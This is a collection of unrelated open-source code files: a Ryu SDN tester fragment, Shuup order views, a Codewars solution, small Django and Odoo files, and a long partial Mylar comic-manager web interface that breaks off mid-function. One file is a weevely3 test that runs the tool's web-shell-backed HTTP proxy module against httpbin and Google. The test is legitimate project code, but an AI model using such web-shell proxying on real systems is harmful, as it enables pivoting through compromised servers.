test_pkt[KEY_INGRESS] = __test_pkt_from_json(test[KEY_INGRESS])
# parse 'egress' or 'PACKET_IN' or 'table-miss'
if KEY_EGRESS in test:
test_pkt[KEY_EGRESS] = __test_pkt_from_json(test[KEY_EGRESS])
elif KEY_PKT_IN in test:
test_pkt[KEY_PKT_IN] = __test_pkt_from_json(test[KEY_PKT_IN])
elif KEY_TBL_MISS in test:
test_pkt[KEY_TBL_MISS] = test[KEY_TBL_MISS]
tests.append(test_pkt)
return (description, prerequisite, tests)
class DummyDatapath(object):
def __init__(self):
self.ofproto = ofproto_v1_3
self.ofproto_parser = ofproto_v1_3_parser
|
Rashminadig/SDN
|
ryu/tests/switch/tester.py
|
Python
|
apache-2.0
| 34,887
|
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import django.views.generic
from django.http import HttpResponseRedirect
from django.views.generic import View
from shuup.core.models import Order, ProductMode
from shuup.front.views.dashboard import DashboardViewMixin
from shuup.utils.django_compat import reverse
class OrderViewMixin(object):
model = Order
def get_queryset(self):
qs = super(OrderViewMixin, self).get_queryset()
return qs.filter(customer=self.request.customer)
class OrderListView(DashboardViewMixin, OrderViewMixin, django.views.generic.ListView):
template_name = "shuup/personal_order_history/order_list.jinja"
context_object_name = "orders"
class OrderDetailView(DashboardViewMixin, OrderViewMixin, django.views.generic.DetailView):
template_name = "shuup/personal_order_history/order_detail.jinja"
context_object_name = "order"
def get_context_data(self, **kwargs):
context = super(OrderDetailView, self).get_context_data(**kwargs)
reorderable_lines = _get_reorderable_lines(context["order"])
context["order_is_reorderable"] = reorderable_lines.exists()
return context
class ReorderView(View):
def get(self, request, *args, **kwargs):
try:
order = Order.objects.get(customer=request.customer, pk=kwargs["pk"])
except Order.DoesNotExist:
return HttpResponseRedirect(reverse("shuup:show-order", kwargs=kwargs))
for line in _get_reorderable_lines(order):
request.basket.add_product(
supplier=line.supplier, shop=request.shop, product=line.product, quantity=line.quantity
)
return HttpResponseRedirect(reverse("shuup:basket"))
def _get_reorderable_lines(order):
"""
Get re-orderable lines of an order.
This is all product lines except:
* child lines, because otherwise package contents are added twice.
* subscriptions, because those don't use normal checkout flow.
"""
return order.lines.products().exclude(parent_line__isnull=False).exclude(product__mode=ProductMode.SUBSCRIPTION)
|
shoopio/shoop
|
shuup/front/apps/personal_order_history/views.py
|
Python
|
agpl-3.0
| 2,304
|
def duplicate_sandwich(arr):
seen = set()
for word in arr:
if word in seen:
double = word
break
seen.add(word)
i1 = -1
i2 = -1
for i,word in enumerate(arr):
if word == double:
if i1 < 0:
i1 = i
else:
i2 = i
break
return arr[i1+1:i2]
|
SelvorWhim/competitive
|
Codewars/DuplicateSandwich.py
|
Python
|
unlicense
| 377
|
from tests.base_test import BaseTest
from tests import config
from core.sessions import SessionURL
from core import modules
from core import messages
import subprocess
import logging
import tempfile
import os
import re
import time
import json
import socket
class Proxy(BaseTest):
def setUp(self):
session = SessionURL(self.url, self.password, volatile = True)
modules.load_modules(session)
self.url = 'http://httpbin-inst'
modules.loaded['net_proxy'].run_argv([ '-lhost', '0.0.0.0', '-lport', '8080' ])
def run_argv(self, arguments, unquoted_args = ''):
arguments += [ '--proxy', '127.0.0.1:8080' ]
result = subprocess.check_output(
'curl -s %s "%s"' % (unquoted_args, '" "'.join(arguments)),
shell=True).strip()
return result
def _json_result(self, args, unquoted_args = ''):
result = self.run_argv(args, unquoted_args).decode('utf-8')
return result if not result else json.loads(result)
def _headers_result(self, args):
return self.run_argv(args, unquoted_args = '-sSL -D - -o /dev/null').splitlines()
def test_all(self):
# HTTPS GET with no SSL check
self.assertIn(
b'Google',
self.run_argv([ 'https://www.google.com', '-k' ])
)
# HTTPS GET with cacert
self.assertIn(
b'Google',
self.run_argv([ 'https://www.google.com' ], unquoted_args='--cacert ~/.weevely/certs/ca.crt')
)
# HTTPS without cacert
try:
self.run_argv([ 'https://www.google.com' ])
except subprocess.CalledProcessError:
pass
else:
self.fail("No error")
# Simple GET
url = self.url + '/get'
self.assertEqual(
url,
self._json_result([ url ])['url']
)
# PUT request
url = self.url + '/put'
self.assertEqual(
url,
self._json_result([ url, '-X', 'PUT' ])['url']
)
# OPTIONS request - there is nothing to test OPTIONS in
# httpbin, but still it's an accepted VERB which returns 200 OK
url = self.url + '/anything'
self.assertEqual(
b'200 OK',
self._headers_result([ url, '-X', 'PUT' ])[0][-6:]
)
# Add header
url = self.url + '/headers'
self.assertEqual(
'value',
self._json_result([ url, '-H', 'X-Arbitrary-Header: value' ])['headers']['X-Arbitrary-Header']
)
# Add cookie
url = self.url + '/cookies'
self.assertEqual(
{'C1': 'bogus', 'C2' : 'bogus2'},
self._json_result([ url, '-b', 'C1=bogus;C2=bogus2' ])['cookies']
)
# POST request with data
url = self.url + '/post'
result = self._json_result([ url, '--data', 'f1=data1&f2=data2' ])
self.assertEqual(
{ 'f1': 'data1', 'f2': 'data2' },
result['form']
)
self.assertEqual(
"application/x-www-form-urlencoded",
result['headers']['Content-Type']
)
# POST request with binary string
url = self.url + '/post'
result = self._json_result([ url ], unquoted_args="--data FIELD=$(env echo -ne 'D\\x41\\x54A\\x00B')")
self.assertEqual(
{ 'FIELD': 'DATAB' },
result['form']
)
# Simple GET with parameters
url = self.url + '/get?f1=data1&f2=data2'
self.assertEqual(
{ 'f1': 'data1', 'f2': 'data2' },
self._json_result([ url ])['args']
)
# HTTPS GET to test SSL checks are disabled
google_ip = socket.gethostbyname('www.google.com')
self.assertIn(
b'google',
self.run_argv([ 'https://' + google_ip, "-k" ])
)
# UNREACHABLE
# This is not true depending on the used ISP, commenting it out
#self.assertIn('Message: Bad Gateway.', self.run_argv([ 'http://co.uk:0' ]))
# FILTERED
self.assertIn(b'Message: Bad Gateway.', self.run_argv([ 'http://www.google.com:9999', '--connect-timeout', '1' ]))
# CLOSED
self.assertIn(b'Message: Bad Gateway.', self.run_argv([ 'http://localhost:9999', '--connect-timeout', '1' ]))
|
epinna/weevely3
|
tests/test_net_proxy.py
|
Python
|
gpl-3.0
| 4,397
|
# -*- coding: utf-8 -*-
"""Tests for safetymomentum views."""
from django.test import TestCase
class TestHome(TestCase):
"""Test the home page."""
def test_get_home(self):
"""Test GET /."""
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
|
jwhitlock/safetymomentum
|
safetymomentum/tests/test_views.py
|
Python
|
mpl-2.0
| 302
|
# -*- coding: utf-8 -*-
# © 2017 Savoir-faire Linux
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import logging
from odoo import api, SUPERUSER_ID
logger = logging.getLogger(__name__)
def update_partners_indexed_name(cr, registry):
env = api.Environment(cr, SUPERUSER_ID, {})
logger.info('Updating indexed name for all partners')
partners = env['res.partner'].search([])
partners._update_indexed_name()
|
savoirfairelinux/partner-addons
|
partner_duplicate_mgmt/init_hook.py
|
Python
|
lgpl-3.0
| 443
|
# This file is part of Mylar.
# -*- coding: utf-8 -*-
#
# Mylar is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mylar is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mylar. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os
import io
import sys
import cherrypy
import requests
import datetime
from datetime import timedelta, date
import re
import json
import copy
import ntpath
from mako.template import Template
from mako.lookup import TemplateLookup
from mako import exceptions
import time
import threading
import csv
import platform
import urllib
import shutil
import mylar
from mylar import logger, db, importer, mb, search, filechecker, helpers, updater, parseit, weeklypull, PostProcessor, librarysync, moveit, Failed, readinglist, notifiers, sabparse, config
from mylar.auth import AuthController, require
import simplejson as simplejson
from operator import itemgetter
def serve_template(templatename, **kwargs):
interface_dir = os.path.join(str(mylar.PROG_DIR), 'data/interfaces/')
template_dir = os.path.join(str(interface_dir), mylar.CONFIG.INTERFACE)
_hplookup = TemplateLookup(directories=[template_dir])
try:
template = _hplookup.get_template(templatename)
return template.render(http_root=mylar.CONFIG.HTTP_ROOT, **kwargs)
except:
return exceptions.html_error_template().render()
class WebInterface(object):
auth = AuthController()
def index(self):
if mylar.SAFESTART:
raise cherrypy.HTTPRedirect("manageComics")
else:
raise cherrypy.HTTPRedirect("home")
index.exposed=True
def home(self):
comics = helpers.havetotals()
return serve_template(templatename="index.html", title="Home", comics=comics, alphaindex=mylar.CONFIG.ALPHAINDEX)
home.exposed = True
def comicDetails(self, ComicID):
myDB = db.DBConnection()
comic = myDB.selectone('SELECT * FROM comics WHERE ComicID=?', [ComicID]).fetchone()
if comic is None:
raise cherrypy.HTTPRedirect("home")
totalissues = comic['Total']
haveissues = comic['Have']
if not haveissues:
haveissues = 0
try:
percent = (haveissues *100.0) /totalissues
if percent > 100:
percent = 101
except (ZeroDivisionError, TypeError):
percent = 0
totalissues = '?'
#let's cheat. :)
#comicskip = myDB.select('SELECT * from comics order by ComicSortName COLLATE NOCASE')
skipno = len(mylar.COMICSORT['SortOrder'])
lastno = mylar.COMICSORT['LastOrderNo']
lastid = mylar.COMICSORT['LastOrderID']
series = {}
if skipno == 0:
#it's a blank db, let's just null the values and go.
series['Current'] = None
series['Previous'] = None
series['Next'] = None
i = 0
while (i < skipno):
cskip = mylar.COMICSORT['SortOrder'][i]
if cskip['ComicID'] == ComicID:
cursortnum = cskip['ComicOrder']
series['Current'] = cskip['ComicID']
if cursortnum == 0:
# if first record, set the Previous record to the LAST record.
previous = lastid
else:
previous = mylar.COMICSORT['SortOrder'][i -1]['ComicID']
# if last record, set the Next record to the FIRST record.
if cursortnum == lastno:
next = mylar.COMICSORT['SortOrder'][0]['ComicID']
else:
next = mylar.COMICSORT['SortOrder'][i +1]['ComicID']
series['Previous'] = previous
series['Next'] = next
break
i+=1
issues = myDB.select('SELECT * FROM issues WHERE ComicID=? order by Int_IssueNumber DESC', [ComicID])
isCounts = {}
isCounts[1] = 0 #1 skipped
isCounts[2] = 0 #2 wanted
isCounts[3] = 0 #3 archived
isCounts[4] = 0 #4 downloaded
isCounts[5] = 0 #5 ignored
isCounts[6] = 0 #6 failed
isCounts[7] = 0 #7 snatched
#isCounts[8] = 0 #8 read
for curResult in issues:
baseissues = {'skipped': 1, 'wanted': 2, 'archived': 3, 'downloaded': 4, 'ignored': 5, 'failed': 6, 'snatched': 7}
for seas in baseissues:
if curResult['Status'] is None:
continue
else:
if seas in curResult['Status'].lower():
sconv = baseissues[seas]
isCounts[sconv]+=1
continue
isCounts = {
"Skipped": str(isCounts[1]),
"Wanted": str(isCounts[2]),
"Archived": str(isCounts[3]),
"Downloaded": str(isCounts[4]),
"Ignored": str(isCounts[5]),
"Failed": str(isCounts[6]),
"Snatched": str(isCounts[7])
}
usethefuzzy = comic['UseFuzzy']
allowpacks = comic['AllowPacks']
skipped2wanted = "0"
if usethefuzzy is None:
usethefuzzy = "0"
force_continuing = comic['ForceContinuing']
if force_continuing is None:
force_continuing = 0
if mylar.CONFIG.DELETE_REMOVE_DIR is None:
mylar.CONFIG.DELETE_REMOVE_DIR = 0
if allowpacks is None:
allowpacks = "0"
if all([comic['Corrected_SeriesYear'] is not None, comic['Corrected_SeriesYear'] != '', comic['Corrected_SeriesYear'] != 'None']):
if comic['Corrected_SeriesYear'] != comic['ComicYear']:
comic['ComicYear'] = comic['Corrected_SeriesYear']
# imagetopull = myDB.selectone('SELECT issueid from issues where ComicID=? AND Int_IssueNumber=?', [comic['ComicID'], helpers.issuedigits(comic['LatestIssue'])]).fetchone()
# imageurl = mylar.cv.getComic(comic['ComicID'], 'image', issueid=imagetopull[0])
# helpers.getImage(comic['ComicID'], imageurl)
if comic['ComicImage'] is None:
comicImage = 'cache/' + str(ComicID) + '.jpg'
else:
comicImage = comic['ComicImage']
comicpublisher = helpers.publisherImages(comic['ComicPublisher'])
if comic['Collects'] is not None:
issues_list = json.loads(comic['Collects'])
else:
issues_list = None
#logger.info('issues_list: %s' % issues_list)
if comic['Corrected_Type'] == 'TPB':
force_type = 1
elif comic['Corrected_Type'] == 'Print':
force_type = 2
else:
force_type = 0
comicConfig = {
"fuzzy_year0": helpers.radio(int(usethefuzzy), 0),
"fuzzy_year1": helpers.radio(int(usethefuzzy), 1),
"fuzzy_year2": helpers.radio(int(usethefuzzy), 2),
"skipped2wanted": helpers.checked(skipped2wanted),
"force_continuing": helpers.checked(force_continuing),
"force_type": helpers.checked(force_type),
"delete_dir": helpers.checked(mylar.CONFIG.DELETE_REMOVE_DIR),
"allow_packs": helpers.checked(int(allowpacks)),
"corrected_seriesyear": comic['ComicYear'],
"torrentid_32p": comic['TorrentID_32P'],
"totalissues": totalissues,
"haveissues": haveissues,
"percent": percent,
"publisher_image": comicpublisher['publisher_image'],
"publisher_image_alt": comicpublisher['publisher_image_alt'],
"publisher_imageH": comicpublisher['publisher_imageH'],
"publisher_imageW": comicpublisher['publisher_imageW'],
"issue_list": issues_list,
"ComicImage": comicImage + '?' + datetime.datetime.now().strftime('%y-%m-%d %H:%M:%S')
}
if mylar.CONFIG.ANNUALS_ON:
annuals = myDB.select("SELECT * FROM annuals WHERE ComicID=? ORDER BY ComicID, Int_IssueNumber DESC", [ComicID])
#we need to load in the annual['ReleaseComicName'] and annual['ReleaseComicID']
#then group by ReleaseComicID, in an attempt to create seperate tables for each different annual series.
#this should allow for annuals, specials, one-shots, etc all to be included if desired.
acnt = 0
aName = []
annuals_list = []
annualinfo = {}
prevcomicid = None
for ann in annuals:
if not any(d.get('annualComicID', None) == str(ann['ReleaseComicID']) for d in aName):
aName.append({"annualComicName": ann['ReleaseComicName'],
"annualComicID": ann['ReleaseComicID']})
issuename = ann['IssueName']
if ann['IssueName'] is not None:
if len(ann['IssueName']) > 75:
issuename = '%s...' % ann['IssueName'][:75]
annuals_list.append({"Issue_Number": ann['Issue_Number'],
"Int_IssueNumber": ann['Int_IssueNumber'],
"IssueName": issuename,
"IssueDate": ann['IssueDate'],
"DigitalDate": ann['DigitalDate'],
"Status": ann['Status'],
"Location": ann['Location'],
"ComicID": ann['ComicID'],
"IssueID": ann['IssueID'],
"ReleaseComicID": ann['ReleaseComicID'],
"ComicName": ann['ComicName'],
"ComicSize": ann['ComicSize'],
"ReleaseComicName": ann['ReleaseComicName'],
"PrevComicID": prevcomicid})
prevcomicid = ann['ReleaseComicID']
acnt+=1
annualinfo = aName
#annualinfo['count'] = acnt
else:
annuals_list = None
aName = None
return serve_template(templatename="comicdetails.html", title=comic['ComicName'], comic=comic, issues=issues, comicConfig=comicConfig, isCounts=isCounts, series=series, annuals=annuals_list, annualinfo=aName)
comicDetails.exposed = True
def searchit(self, name, issue=None, mode=None, type=None, serinfo=None):
if type is None: type = 'comic' # let's default this to comic search only for the time being (will add story arc, characters, etc later)
else: logger.fdebug(str(type) + " mode enabled.")
#mode dictates type of search:
# --series ... search for comicname displaying all results
# --pullseries ... search for comicname displaying a limited # of results based on issue
# --want ... individual comics
if mode is None: mode = 'series'
if len(name) == 0:
raise cherrypy.HTTPRedirect("home")
if type == 'comic' and mode == 'pullseries':
if issue == 0:
#if it's an issue 0, CV doesn't have any data populated yet - so bump it up one to at least get the current results.
issue = 1
try:
searchresults = mb.findComic(name, mode, issue=issue)
except TypeError:
logger.error('Unable to perform required pull-list search for : [name: ' + name + '][issue: ' + issue + '][mode: ' + mode + ']')
return
elif type == 'comic' and mode == 'series':
if name.startswith('4050-'):
mismatch = "no"
comicid = re.sub('4050-', '', name)
logger.info('Attempting to add directly by ComicVineID: ' + str(comicid) + '. I sure hope you know what you are doing.')
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None]).start()
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
try:
searchresults = mb.findComic(name, mode, issue=None)
except TypeError:
logger.error('Unable to perform required search for : [name: ' + name + '][mode: ' + mode + ']')
return
elif type == 'comic' and mode == 'want':
try:
searchresults = mb.findComic(name, mode, issue)
except TypeError:
logger.error('Unable to perform required one-off pull-list search for : [name: ' + name + '][issue: ' + issue + '][mode: ' + mode + ']')
return
elif type == 'story_arc':
try:
searchresults = mb.findComic(name, mode=None, issue=None, type='story_arc')
except TypeError:
logger.error('Unable to perform required story-arc search for : [arc: ' + name + '][mode: ' + mode + ']')
return
try:
searchresults = sorted(searchresults, key=itemgetter('comicyear', 'issues'), reverse=True)
except Exception as e:
logger.error('Unable to retrieve results from ComicVine: %s' % e)
if mylar.CONFIG.COMICVINE_API is None:
logger.error('You NEED to set a ComicVine API key prior to adding anything. It\'s Free - Go get one!')
return
return serve_template(templatename="searchresults.html", title='Search Results for: "' + name + '"', searchresults=searchresults, type=type, imported=None, ogcname=None, name=name, serinfo=serinfo)
searchit.exposed = True
def addComic(self, comicid, comicname=None, comicyear=None, comicimage=None, comicissues=None, comicpublisher=None, imported=None, ogcname=None, serinfo=None):
myDB = db.DBConnection()
if imported == "confirm":
# if it's coming from the importer and it's just for confirmation, record the right selection and break.
# if it's 'confirmed' coming in as the value for imported
# the ogcname will be the original comicid that is either correct/incorrect (doesn't matter which)
#confirmedid is the selected series (comicid) with the letter C at the beginning to denote Confirmed.
# then sql the original comicid which will hit on all the results for the given series.
# iterate through, and overwrite the existing watchmatch with the new chosen 'C' + comicid value
confirmedid = "C" + str(comicid)
confirms = myDB.select("SELECT * FROM importresults WHERE WatchMatch=?", [ogcname])
if confirms is None:
logger.Error("There are no results that match...this is an ERROR.")
else:
for confirm in confirms:
controlValue = {"impID": confirm['impID']}
newValue = {"WatchMatch": str(confirmedid)}
myDB.upsert("importresults", newValue, controlValue)
self.importResults()
return
elif imported == 'futurecheck':
print 'serinfo:' + str(serinfo)
logger.info('selected comicid of : ' + str(comicid) + ' [ ' + comicname + ' (' + str(comicyear) + ') ]')
ser = []
ser.append({"comicname": comicname,
"comicyear": comicyear,
"comicissues": comicissues,
"comicpublisher": comicpublisher,
"IssueDate": serinfo[0]['IssueDate'],
"IssueNumber": serinfo[0]['IssueNumber']})
weeklypull.future_check_add(comicid, ser)
sresults = []
cresults = []
mismatch = "no"
#print ("comicid: " + str(comicid))
#print ("comicname: " + str(comicname))
#print ("comicyear: " + str(comicyear))
#print ("comicissues: " + str(comicissues))
#print ("comicimage: " + str(comicimage))
if not mylar.CONFIG.CV_ONLY:
#here we test for exception matches (ie. comics spanning more than one volume, known mismatches, etc).
CV_EXcomicid = myDB.selectone("SELECT * from exceptions WHERE ComicID=?", [comicid]).fetchone()
if CV_EXcomicid is None: # pass #
gcdinfo=parseit.GCDScraper(comicname, comicyear, comicissues, comicid, quickmatch="yes")
if gcdinfo == "No Match":
#when it no matches, the image will always be blank...let's fix it.
cvdata = mylar.cv.getComic(comicid, 'comic')
comicimage = cvdata['ComicImage']
updater.no_searchresults(comicid)
nomatch = "true"
u_comicname = comicname.encode('utf-8').strip()
logger.info("I couldn't find an exact match for " + u_comicname + " (" + str(comicyear) + ") - gathering data for Error-Checking screen (this could take a minute)...")
i = 0
loopie, cnt = parseit.ComChk(comicname, comicyear, comicpublisher, comicissues, comicid)
logger.info("total count : " + str(cnt))
while (i < cnt):
try:
stoopie = loopie['comchkchoice'][i]
except (IndexError, TypeError):
break
cresults.append({
'ComicID': stoopie['ComicID'],
'ComicName': stoopie['ComicName'].decode('utf-8', 'replace'),
'ComicYear': stoopie['ComicYear'],
'ComicIssues': stoopie['ComicIssues'],
'ComicURL': stoopie['ComicURL'],
'ComicPublisher': stoopie['ComicPublisher'].decode('utf-8', 'replace'),
'GCDID': stoopie['GCDID']
})
i+=1
if imported != 'None':
#if it's from an import and it has to go through the UEC, return the values
#to the calling function and have that return the template
return cresults
else:
return serve_template(templatename="searchfix.html", title="Error Check", comicname=comicname, comicid=comicid, comicyear=comicyear, comicimage=comicimage, comicissues=comicissues, cresults=cresults, imported=None, ogcname=None)
else:
nomatch = "false"
logger.info(u"Quick match success..continuing.")
else:
if CV_EXcomicid['variloop'] == '99':
logger.info(u"mismatched name...autocorrecting to correct GID and auto-adding.")
mismatch = "yes"
if CV_EXcomicid['NewComicID'] == 'none':
logger.info(u"multi-volume series detected")
testspx = CV_EXcomicid['GComicID'].split('/')
for exc in testspx:
fakeit = parseit.GCDAdd(testspx)
howmany = int(CV_EXcomicid['variloop'])
t = 0
while (t <= howmany):
try:
sres = fakeit['serieschoice'][t]
except IndexError:
break
sresults.append({
'ComicID': sres['ComicID'],
'ComicName': sres['ComicName'],
'ComicYear': sres['ComicYear'],
'ComicIssues': sres['ComicIssues'],
'ComicPublisher': sres['ComicPublisher'],
'ComicCover': sres['ComicCover']
})
t+=1
#searchfix(-1).html is for misnamed comics and wrong years.
#searchfix-2.html is for comics that span multiple volumes.
return serve_template(templatename="searchfix-2.html", title="In-Depth Results", sresults=sresults)
#print ("imported is: " + str(imported))
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None, imported, ogcname]).start()
time.sleep(5) #wait 5s so the db can be populated enough to display the page - otherwise will return to home page if not enough info is loaded.
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
addComic.exposed = True
def addbyid(self, comicid, calledby=None, imported=None, ogcname=None, nothread=False):
mismatch = "no"
logger.info('Attempting to add directly by ComicVineID: ' + str(comicid))
if comicid.startswith('4050-'): comicid = re.sub('4050-', '', comicid)
if nothread is False:
threading.Thread(target=importer.addComictoDB, args=[comicid, mismatch, None, imported, ogcname]).start()
else:
return importer.addComictoDB(comicid, mismatch, None, imported, ogcname)
if calledby == True or calledby == 'True':
return
elif calledby == 'web-import':
raise cherrypy.HTTPRedirect("importResults")
else:
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
addbyid.exposed = True
def addStoryArc_thread(self, **kwargs):
threading.Thread(target=self.addStoryArc, kwargs=kwargs).start()
addStoryArc_thread.exposed = True
def addStoryArc(self, arcid, arcrefresh=False, cvarcid=None, arclist=None, storyarcname=None, storyarcyear=None, storyarcpublisher=None, storyarcissues=None, desc=None, image=None):
# used when a choice is selected to 'add story arc' via the searchresults screen (via the story arc search).
# arclist contains ALL the issueid's in sequence, along with the issue titles.
# call the function within cv.py to grab all the issueid's and return all the issue data
module = '[STORY ARC]'
myDB = db.DBConnection()
#check if it already exists.
if cvarcid is None:
arc_chk = myDB.select('SELECT * FROM storyarcs WHERE StoryArcID=?', [arcid])
else:
arc_chk = myDB.select('SELECT * FROM storyarcs WHERE CV_ArcID=?', [cvarcid])
if arc_chk is None:
if arcrefresh:
logger.warn(module + ' Unable to retrieve Story Arc ComicVine ID from the db. Unable to refresh Story Arc at this time. You probably have to delete/readd the story arc this one time for Refreshing to work properly.')
return
else:
logger.fdebug(module + ' No match in db based on ComicVine ID. Making sure and checking against Story Arc Name.')
arc_chk = myDB.select('SELECT * FROM storyarcs WHERE StoryArc=?', [storyarcname])
if arc_chk is None:
logger.warn(module + ' ' + storyarcname + ' already exists on your Story Arc Watchlist!')
raise cherrypy.HTTPRedirect("readlist")
else:
if arcrefresh: #cvarcid must be present here as well..
logger.info(module + '[' + str(arcid) + '] Successfully found Story Arc ComicVine ID [4045-' + str(cvarcid) + '] within db. Preparing to refresh Story Arc.')
# we need to store the existing arc values that are in the db, so we don't create duplicate entries or mess up items.
iss_arcids = []
for issarc in arc_chk:
iss_arcids.append({"IssueArcID": issarc['IssueArcID'],
"IssueID": issarc['IssueID'],
"Manual": issarc['Manual']})
arcinfo = mb.storyarcinfo(cvarcid)
if len(arcinfo) > 1:
arclist = arcinfo['arclist']
else:
logger.warn(module + ' Unable to retrieve issue details at this time. Something is probably wrong.')
return
# else:
# logger.warn(module + ' ' + storyarcname + ' already exists on your Story Arc Watchlist.')
# raise cherrypy.HTTPRedirect("readlist")
#check to makes sure storyarcs dir is present in cache in order to save the images...
if not os.path.isdir(os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs')):
checkdirectory = filechecker.validateAndCreateDirectory(os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs'), True)
if not checkdirectory:
logger.warn('Error trying to validate/create cache storyarc directory. Aborting this process at this time.')
return
coverfile = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs', str(cvarcid) + "-banner.jpg")
if mylar.CONFIG.CVAPI_RATE is None or mylar.CONFIG.CVAPI_RATE < 2:
time.sleep(2)
else:
time.sleep(mylar.CONFIG.CVAPI_RATE)
logger.info('Attempting to retrieve the comic image for series')
if arcrefresh:
imageurl = arcinfo['comicimage']
else:
imageurl = image
logger.info('imageurl: %s' % imageurl)
try:
r = requests.get(imageurl, params=None, stream=True, verify=mylar.CONFIG.CV_VERIFY, headers=mylar.CV_HEADERS)
except Exception, e:
logger.warn('Unable to download image from CV URL link - possibly no arc picture is present: %s' % imageurl)
else:
logger.fdebug('comic image retrieval status code: %s' % r.status_code)
if str(r.status_code) != '200':
logger.warn('Unable to download image from CV URL link: %s [Status Code returned: %s]' % (imageurl, r.status_code))
else:
if r.headers.get('Content-Encoding') == 'gzip':
import gzip
from StringIO import StringIO
buf = StringIO(r.content)
f = gzip.GzipFile(fileobj=buf)
with open(coverfile, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
arc_results = mylar.cv.getComic(comicid=None, type='issue', arcid=arcid, arclist=arclist)
logger.fdebug('%s Arcresults: %s' % (module, arc_results))
logger.fdebug('%s Arclist: %s' % (module, arclist))
if len(arc_results) > 0:
import random
issuedata = []
if storyarcissues is None:
storyarcissues = len(arc_results['issuechoice'])
if arcid is None:
storyarcid = str(random.randint(1000,9999)) + str(storyarcissues)
else:
storyarcid = arcid
n = 0
cidlist = ''
iscnt = int(storyarcissues)
while (n <= iscnt):
try:
arcval = arc_results['issuechoice'][n]
except IndexError:
break
comicname = arcval['ComicName']
st_d = mylar.filechecker.FileChecker(watchcomic=comicname)
st_dyninfo = st_d.dynamic_replace(comicname)
dynamic_name = re.sub('[\|\s]','', st_dyninfo['mod_seriesname'].lower()).strip()
issname = arcval['Issue_Name']
issid = str(arcval['IssueID'])
comicid = str(arcval['ComicID'])
#--- this needs to get changed so comicid within a comicid doesn't exist (ie. 3092 is IN 33092)
cid_count = cidlist.count(comicid) +1
a_end = 0
i = 0
while i < cid_count:
a = cidlist.find(comicid, a_end)
a_end = cidlist.find('|',a)
if a_end == -1: a_end = len(cidlist)
a_length = cidlist[a:a_end-1]
if a == -1 and len(a_length) != len(comicid):
if n == 0:
cidlist += str(comicid)
else:
cidlist += '|' + str(comicid)
break
i+=1
#don't recreate the st_issueid if it's a refresh and the issueid already exists (will create duplicates otherwise)
st_issueid = None
manual_mod = None
if arcrefresh:
for aid in iss_arcids:
if aid['IssueID'] == issid:
st_issueid = aid['IssueArcID']
manual_mod = aid['Manual']
break
if st_issueid is None:
st_issueid = str(storyarcid) + "_" + str(random.randint(1000,9999))
issnum = arcval['Issue_Number']
issdate = str(arcval['Issue_Date'])
digitaldate = str(arcval['Digital_Date'])
storedate = str(arcval['Store_Date'])
int_issnum = helpers.issuedigits(issnum)
#verify the reading order if present.
findorder = arclist.find(issid)
if findorder != -1:
ros = arclist.find('|',findorder+1)
if ros != -1:
roslen = arclist[findorder:ros]
else:
#last entry doesn't have a trailling '|'
roslen = arclist[findorder:]
rosre = re.sub(issid,'', roslen)
readingorder = int(re.sub('[\,\|]','', rosre).strip())
else:
readingorder = 0
logger.fdebug('[%s] issueid: %s - findorder#: %s' % (readingorder, issid, findorder))
issuedata.append({"ComicID": comicid,
"IssueID": issid,
"StoryArcID": storyarcid,
"IssueArcID": st_issueid,
"ComicName": comicname,
"DynamicName": dynamic_name,
"IssueName": issname,
"Issue_Number": issnum,
"IssueDate": issdate,
"ReleaseDate": storedate,
"DigitalDate": digitaldate,
"ReadingOrder": readingorder, #n +1,
"Int_IssueNumber": int_issnum,
"Manual": manual_mod})
n+=1
comicid_results = mylar.cv.getComic(comicid=None, type='comicyears', comicidlist=cidlist)
logger.fdebug('%s Initiating issue updating - just the info' % module)
for AD in issuedata:
seriesYear = 'None'
issuePublisher = 'None'
seriesVolume = 'None'
if AD['IssueName'] is None:
IssueName = 'None'
else:
IssueName = AD['IssueName'][:70]
for cid in comicid_results:
if cid['ComicID'] == AD['ComicID']:
seriesYear = cid['SeriesYear']
issuePublisher = cid['Publisher']
seriesVolume = cid['Volume']
bookType = cid['Type']
seriesAliases = cid['Aliases']
if storyarcpublisher is None:
#assume that the arc is the same
storyarcpublisher = issuePublisher
break
newCtrl = {"IssueID": AD['IssueID'],
"StoryArcID": AD['StoryArcID']}
newVals = {"ComicID": AD['ComicID'],
"IssueArcID": AD['IssueArcID'],
"StoryArc": storyarcname,
"ComicName": AD['ComicName'],
"Volume": seriesVolume,
"DynamicComicName": AD['DynamicName'],
"IssueName": IssueName,
"IssueNumber": AD['Issue_Number'],
"Publisher": storyarcpublisher,
"TotalIssues": storyarcissues,
"ReadingOrder": AD['ReadingOrder'],
"IssueDate": AD['IssueDate'],
"ReleaseDate": AD['ReleaseDate'],
"DigitalDate": AD['DigitalDate'],
"SeriesYear": seriesYear,
"IssuePublisher": issuePublisher,
"CV_ArcID": arcid,
"Int_IssueNumber": AD['Int_IssueNumber'],
"Type": bookType,
"Aliases": seriesAliases,
"Manual": AD['Manual']}
myDB.upsert("storyarcs", newVals, newCtrl)
#run the Search for Watchlist matches now.
logger.fdebug(module + ' Now searching your watchlist for matches belonging to this story arc.')
self.ArcWatchlist(storyarcid)
if arcrefresh:
logger.info('%s Successfully Refreshed %s' % (module, storyarcname))
return
else:
